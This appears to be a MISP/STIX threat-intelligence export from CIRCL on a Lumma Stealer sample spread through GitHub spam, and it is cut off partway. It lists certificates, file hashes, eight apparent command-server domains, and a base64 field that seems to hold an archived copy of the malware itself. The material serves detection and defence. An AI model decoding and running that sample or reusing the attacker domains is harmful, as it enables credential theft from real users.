1019 lines
506 KiB
JSON
1019 lines
506 KiB
JSON
|
{
|
||
|
"type": "bundle",
|
||
|
"id": "bundle--eaa6f2f7-a944-47d2-a71d-cc7080c27fed",
|
||
|
"objects": [
|
||
|
{
|
||
|
"type": "identity",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T07:30:53.000Z",
|
||
|
"modified": "2024-09-19T07:30:53.000Z",
|
||
|
"name": "CIRCL",
|
||
|
"identity_class": "organization"
|
||
|
},
|
||
|
{
|
||
|
"type": "report",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "report--eaa6f2f7-a944-47d2-a71d-cc7080c27fed",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T07:30:53.000Z",
|
||
|
"modified": "2024-09-19T07:30:53.000Z",
|
||
|
"name": "Lumma Stealer Malware (delivered via GitHub Spam) - Pandora analysis (l6E.exe)",
|
||
|
"published": "2024-09-19T07:31:18Z",
|
||
|
"object_refs": [
|
||
|
"observed-data--d98b9983-dd3f-46e0-886f-d239c9901b8f",
|
||
|
"x509-certificate--d98b9983-dd3f-46e0-886f-d239c9901b8f",
|
||
|
"observed-data--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
|
||
|
"x509-certificate--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
|
||
|
"x-misp-object--c30b4f6b-e94d-4995-9e2a-ab675a47a020",
|
||
|
"indicator--5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
|
||
|
"indicator--8ad8f83d-4f64-4a66-8849-e6b3fe938725",
|
||
|
"malware--7b88da77-5001-4565-926e-965d55319a24",
|
||
|
"observed-data--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
|
||
|
"email-message--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
|
||
|
"indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
|
||
|
"malware--a4e7b874-225e-4206-9cf8-f858854d4ca5",
|
||
|
"x-misp-object--74c5c23f-d5e2-4407-b36a-94bb95135a77",
|
||
|
"x-misp-object--a9e61709-f87b-460b-9b43-03e65c73158e",
|
||
|
"x-misp-object--8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
|
||
|
"x-misp-object--b53c8423-c8a7-4863-a01a-3e9eebcb199f",
|
||
|
"x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
|
||
|
"indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
|
||
|
"x-misp-object--955c7da3-97ac-4ea0-bc8d-50dee6e03306",
|
||
|
"x-misp-object--d8e8ebd4-0bdd-44f7-9802-14ebf7842bb1",
|
||
|
"x-misp-object--dd34d3e1-91f3-4dd5-95b8-b870b7a19f84",
|
||
|
"relationship--8fb1b0ab-8275-4d7d-bf33-fff50945409b",
|
||
|
"relationship--a7ad8124-928f-4630-9572-0a842e4f054f",
|
||
|
"relationship--11f78223-6aa5-498f-ade3-7614709517ab",
|
||
|
"relationship--28aaf756-8380-4651-8f67-8179d33ae7eb",
|
||
|
"relationship--778739ce-7d62-407e-b7d7-47738f1f20a7",
|
||
|
"relationship--e330e7a8-ca8d-4c09-a08d-995897dd83a5",
|
||
|
"relationship--2e94d260-5c02-44f7-b254-ae11af7a2fb9",
|
||
|
"relationship--cd29672f-ec6e-4c10-964e-15f32d57a4cd",
|
||
|
"relationship--ea68661a-18d8-4e1e-ad7f-072952fb7b1b",
|
||
|
"relationship--b21581ce-31d2-422c-b108-c7c3ee1c94c9",
|
||
|
"relationship--16799923-4654-457e-8d30-1d5975e69155",
|
||
|
"relationship--09f6a1c4-3452-443e-a223-ab9687823be4",
|
||
|
"relationship--0bbed3e1-5677-41b6-b35a-75adfa959e7e"
|
||
|
],
|
||
|
"labels": [
|
||
|
"Threat-Report",
|
||
|
"misp:tool=\"MISP-STIX-Converter\"",
|
||
|
"misp-galaxy:malpedia=\"Lumma Stealer\"",
|
||
|
"type:OSINT",
|
||
|
"osint:lifetime=\"perpetual\"",
|
||
|
"tlp:clear"
|
||
|
],
|
||
|
"object_marking_refs": [
|
||
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--d98b9983-dd3f-46e0-886f-d239c9901b8f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"first_observed": "2024-09-19T06:17:26Z",
|
||
|
"last_observed": "2024-09-19T06:17:26Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"x509-certificate--d98b9983-dd3f-46e0-886f-d239c9901b8f"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"x509\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"False\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x509-certificate",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x509-certificate--d98b9983-dd3f-46e0-886f-d239c9901b8f",
|
||
|
"version": "3",
|
||
|
"signature_algorithm": "1.2.840.113549.1.1.12",
|
||
|
"issuer": "C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Trusted Root G4",
|
||
|
"validity_not_before": "2021-04-29T00:00:00Z",
|
||
|
"validity_not_after": "2036-04-28T23:59:59Z",
|
||
|
"subject": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",
|
||
|
"x_misp_raw_base64": "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"
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"first_observed": "2024-09-19T06:17:26Z",
|
||
|
"last_observed": "2024-09-19T06:17:26Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"x509-certificate--e64b7f30-9aed-4fff-823b-72c2a22b16f8"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"x509\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"False\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x509-certificate",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x509-certificate--e64b7f30-9aed-4fff-823b-72c2a22b16f8",
|
||
|
"version": "3",
|
||
|
"signature_algorithm": "1.2.840.113549.1.1.11",
|
||
|
"issuer": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",
|
||
|
"validity_not_before": "2022-09-22T00:00:00Z",
|
||
|
"validity_not_after": "2023-10-19T23:59:59Z",
|
||
|
"subject": "??=SE, ??=Private Organization, serialNumber=5567037485, C=SE, L=Stockholm, O=Spotify AB, CN=Spotify AB",
|
||
|
"x_misp_raw_base64": "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"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--c30b4f6b-e94d-4995-9e2a-ab675a47a020",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"authenticode-signerinfo\"",
|
||
|
"misp:meta-category=\"file\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "issuer",
|
||
|
"value": "C=US, O=DigiCert\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",
|
||
|
"category": "Other",
|
||
|
"uuid": "f90f1d07-fe98-4bbb-8436-730415190e8b"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "version",
|
||
|
"value": "1",
|
||
|
"category": "Other",
|
||
|
"uuid": "00da5189-e1ae-4642-901c-cf7320e7bde8"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "digest_algorithm",
|
||
|
"value": "lief._lief.PE.ALGORITHMS.SHA_256",
|
||
|
"category": "Other",
|
||
|
"uuid": "38c06d22-7fb9-48cc-af3a-13745e979bb8"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "encryption_algorithm",
|
||
|
"value": "lief._lief.PE.ALGORITHMS.RSA",
|
||
|
"category": "Other",
|
||
|
"uuid": "45c36dff-e7df-46da-aaa4-1ed160399d3c"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "digest-base64",
|
||
|
"value": "He0POadHf8XSEC0gfF8OrYthzmL5j0x3n+yt7ddmDbC5Tzxvu3L+mg0IoqZoMwRL+30Ji7BheT9V0dhkzYQHxkgDa8NjviUj1ZrRjf2B+de1VNuKWmOrqWEj5/Fn2dcwuAL2T0oYV5ncJAGqsm6i/m/fKCfULIN4jWgYBkIuqmNtoFcX24RgbAKeLKzvUVKCBOZK0UTEWe7wYg5HptSUzbHSAGKBodJ1kpjnlBx2YNB6IMepEJr/CHGRjAJG83zAskVQJB4Yx3pQBnSVXcA8Wxx5WOwRolQfxTrAw6iSKFakNLAJNb0OmL1WaruDQAFweR02c2JRIZHxYFp3YFwTooYBQJltCWKKJdtkTmI6GaLzI6qaAOXbDcQ3vULwA0ZE/VXIlHdfEMW79chazxYHMzpNKvZHrUrFSnDNgyWxp+M1yOunAG6XHpHV/jkUQpP5au/woxVY4lQ+xHf2kxHRC5DTakIWOi8Jq1M5rDnJas2qsOpkI4pFjOhRA/m/Hg/ODUyX7tvqcR+XL8W4MIScODCw01HNzuMI7BL2/zWFzyKSesw2cESxGEiTo/D0sVF2yqqc7C1ioPXPtAHq5Sl2nowfZLYChpmd7I8flt+SKbo95a0O27TcZvwlaMy0Jy5O1+KPajL5hRcJX801gLCf4fKHPTNfc6dX1RPjzWokplg=",
|
||
|
"category": "Other",
|
||
|
"uuid": "6f842da7-09df-499a-9454-865b71b343d5"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "file",
|
||
|
"x_misp_name": "authenticode-signerinfo"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T07:28:43.000Z",
|
||
|
"modified": "2024-09-19T07:28:43.000Z",
|
||
|
"pattern": "[file:hashes.MD5 = 'fac2188e4a28a0cf32bf4417d797b0f8' AND file:hashes.SHA1 = '1970de8788c07b548bf04d0062a1d4008196a709' AND file:hashes.SHA256 = 'd737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207' AND file:hashes.SHA512 = '58086100d653ceeae44e0c99ec8348dd2beaf198240f37691766bee813953f8514c485e39f5552ee0d18c61f02bff10c0c427f3fec931bc891807be188164b2b' AND file:hashes.SSDEEP = '6144:HDd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QE:B+O5yIqxwI3tFOqWeqcYbZYzE' AND file:name = 'l6E.exe' AND file:size = '354168' AND (file:content_ref.payload_bin = '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
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2024-09-19T07:28:43Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "file"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"file\"",
|
||
|
"misp:meta-category=\"file\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--8ad8f83d-4f64-4a66-8849-e6b3fe938725",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:20:38.000Z",
|
||
|
"modified": "2024-09-19T06:20:38.000Z",
|
||
|
"pattern": "[(network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'tryyudjasudqo.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'eemmbryequo.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'reggwardssdqw.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'relaxatinownio.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'tesecuuweqo.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'tendencctywop.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'licenseodqwmqn.shop') AND (network-traffic:dst_ref.type = 'domain-name' AND network-traffic:dst_ref.value = 'keennylrwmqlw.shop')]",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2024-09-19T06:20:38Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
